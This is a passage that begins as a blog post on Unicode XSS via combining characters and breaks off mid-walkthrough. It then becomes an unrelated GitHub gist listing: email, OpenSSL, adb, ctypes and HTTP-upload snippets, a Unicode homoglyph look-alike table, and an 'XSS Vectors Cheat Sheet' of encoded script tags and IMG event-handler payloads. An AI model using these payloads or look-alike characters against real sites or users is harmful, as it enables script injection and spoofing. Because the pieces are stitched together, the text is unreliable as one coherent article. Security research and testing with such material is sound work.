Unicode XSS via Combining Characters

Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.

Recap of Unicode XSS

Lab: https://4t64ubva.xssy.uk/

A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:

@julianandrews
julianandrews / send-gmail.sh
Created April 22, 2021 16:46
Simple shell script to send email using gmail
# Depends on: msmtp, libsecret-tools
#
# Set password:
# secret-tool store --label="msmtp password for jandrews271@gmail.com" service msmtp username jandrews271@gmail.com
#
# Send mail:
# echo "Message Body" | send-gmail myusername recipient@example.com "My Subject"
send-gmail() {
local user="$1"
local to="$2"
@Hakky54
Hakky54 / openssl_commands.md
Last active July 23, 2024 15:29 — forked from p3t3r67x0/openssl_commands.md
A list of openssl commands to check and verify your keys

OpenSSL 🔐

Install

Install OpenSSL on Debian-based systems

sudo apt-get install openssl
@StevenACoffman
StevenACoffman / Homoglyphs.md
Last active July 20, 2024 15:07
Unicode Look-alikes

Unicode Character Look-Alikes

Original Letter Look-Alike(s)
a а ạ ą ä à á ą
c с ƈ ċ
d ԁ ɗ
e е ẹ ė é è
g ġ
h һ
@melvinsh
melvinsh / mimetypes.txt
Created December 13, 2018 23:01
Mime types for Burp Suite
application/atom+xml
application/json
application/json
application/json
application/ld+json
application/rss+xml
application/vnd.geo+json
application/xml
application/xml
application/javascript
@arjunv
arjunv / keyevents.json
Created December 2, 2018 00:01
All Android Key Events for usage with adb shell
{
"key_events": {
"key_unknown": "adb shell input keyevent 0",
"key_soft_left": "adb shell input keyevent 1",
"key_soft_right": "adb shell input keyevent 2",
"key_home": "adb shell input keyevent 3",
"key_back": "adb shell input keyevent 4",
"key_call": "adb shell input keyevent 5",
"key_endcall": "adb shell input keyevent 6",
"key_0": "adb shell input keyevent 7",
@JonathonReinhart
JonathonReinhart / ctypes_structs_example.py
Last active November 4, 2022 13:39
Using Python ctypes to manipulate binary data
#!/usr/bin/env python3
from __future__ import print_function
from tempfile import TemporaryFile
from binascii import hexlify
from ctypes import *
class StructHelper(object):
def __get_value_str(self, name, fmt='{}'):
val = getattr(self, name)
@kurobeats
kurobeats / xss_vectors.txt
Last active July 27, 2024 17:05
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@amdei
amdei / SimpleHTTPServerWithUpload.py
Last active August 30, 2022 12:36 — forked from UniIsland/SimpleHTTPServerWithUpload.py
Simple Python Http Server with Upload
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""
__version__ = "0.1"
__all__ = ["SimpleHTTPRequestHandler"]